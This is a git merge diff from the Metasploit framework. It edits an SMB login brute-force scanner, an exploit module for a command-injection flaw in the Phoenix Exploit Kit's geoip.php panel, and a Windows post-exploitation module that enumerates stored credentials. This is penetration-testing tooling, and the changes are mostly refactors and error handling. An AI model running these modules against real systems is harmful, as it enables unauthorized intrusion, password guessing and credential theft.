Merge branch 'master' into feature/MS-1715/rex-socket-gem

2016-08-30 10:37:37 -05:00 · 2016-08-30 10:37:37 -05:00 · 4b2d6b623d
parent fa6d1965fc e403df57e0
commit 4b2d6b623d
3 changed files with 32 additions and 20 deletions
--- a/modules/auxiliary/scanner/smb/smb_login.rb
+++ b/modules/auxiliary/scanner/smb/smb_login.rb
@ -70,6 +70,7 @@ class MetasploitModule < Msf::Auxiliary
    @scanner = Metasploit::Framework::LoginScanner::SMB.new(
      host: ip,
      port: rport,
+      local_port: datastore['CPORT'],
      stop_on_success: datastore['STOP_ON_SUCCESS'],
      bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
      connection_timeout: 5,
--- a/modules/exploits/multi/http/phoenix_exec.rb
+++ b/modules/exploits/multi/http/phoenix_exec.rb
@ -14,22 +14,22 @@ class MetasploitModule < Msf::Exploit::Remote
    super(update_info(info,
      'Name'           => 'Phoenix Exploit Kit Remote Code Execution',
      'Description'    => %q{
-        This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit via the geoip.php. The
+        This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit via geoip.php. The
        Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for the
-        presence of outdated and insecure versions of browser plugins like Java, and Adobe Flash and Reader which
-        then silently installs malware.
+        presence of outdated and insecure versions of browser plugins like Java and Adobe Flash and Reader,
+        silently installing malware if found.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
-          'CrashBandicot @DosPerl', #initial discovery
-          'Jay Turla <@shipcod3>', #msf module
+          'CrashBandicot', #initial discovery by @DosPerl
+          'Jay Turla' #msf module by @shipcod3
        ],
      'References'     =>
        [
          [ 'EDB', '40047' ],
          [ 'URL', 'http://krebsonsecurity.com/tag/phoenix-exploit-kit/' ], # description of Phoenix Exploit Kit
-          [ 'URL', 'https://www.pwnmalw.re/Exploit%20Pack/phoenix' ],
+          [ 'URL', 'https://www.pwnmalw.re/Exploit%20Pack/phoenix' ]
        ],
      'Privileged'     => false,
      'Payload'        =>
@ -45,16 +45,16 @@ class MetasploitModule < Msf::Exploit::Remote
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
-          ['Phoenix Exploit Kit / Unix', { 'Platform' => 'unix' } ],
-          ['Phoenix Exploit Kit / Windows', { 'Platform' => 'win' } ]
+          [ 'Phoenix Exploit Kit / Unix', { 'Platform' => 'unix' } ],
+          [ 'Phoenix Exploit Kit / Windows', { 'Platform' => 'win' } ]
        ],
      'DisclosureDate' => 'Jul 01 2016',
      'DefaultTarget'  => 0))

    register_options(
      [
-        OptString.new('TARGETURI', [true, 'The path of geoip.php which is vulnerable to RCE', '/Phoenix/includes/geoip.php']),
-      ],self.class)
+        OptString.new('TARGETURI', [true, 'The path of geoip.php which is vulnerable to RCE', '/Phoenix/includes/geoip.php'])
+      ], self.class)
  end

  def check
@ -63,7 +63,7 @@ class MetasploitModule < Msf::Exploit::Remote
    if res && res.body.include?(test)
      return Exploit::CheckCode::Vulnerable
    end
-    return Exploit::CheckCode::Safe
+    Exploit::CheckCode::Safe
  end

  def exploit
@ -72,12 +72,12 @@ class MetasploitModule < Msf::Exploit::Remote
  end

  def http_send_command(cmd)
-    send_request_cgi({
+    send_request_cgi(
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path),
      'vars_get' => {
        'bdr' => cmd
      }
-    })
+    )
  end
 end
--- a/modules/post/windows/gather/credentials/enum_cred_store.rb
+++ b/modules/post/windows/gather/credentials/enum_cred_store.rb
@ -178,14 +178,25 @@ class MetasploitModule < Msf::Post
    credentials = []
    #call credenumerate to get the ptr needed
    adv32 = session.railgun.advapi32
-    ret = adv32.CredEnumerateA(nil,0,4,4)
-    p_to_arr = ret["Credentials"].unpack("V")
-    if is_86
-      count = ret["Count"]
-      arr_len = count * 4
+    begin
+      ret = adv32.CredEnumerateA(nil,0,4,4)
+    rescue Rex::Post::Meterpreter::RequestError => e
+      print_error("This module requires WinXP or higher")
+      print_error("CredEnumerateA() failed: #{e.class} #{e}")
+      ret = nil
+    end
+    if ret.nil?
+      count = 0
+      arr_len = 0
    else
-      count = ret["Count"] & 0x00000000ffffffff
-      arr_len = count * 8
+      p_to_arr = ret["Credentials"].unpack("V")
+      if is_86
+        count = ret["Count"]
+        arr_len = count * 4
+      else
+        count = ret["Count"] & 0x00000000ffffffff
+        arr_len = count * 8
+      end
    end

    #tell user what's going on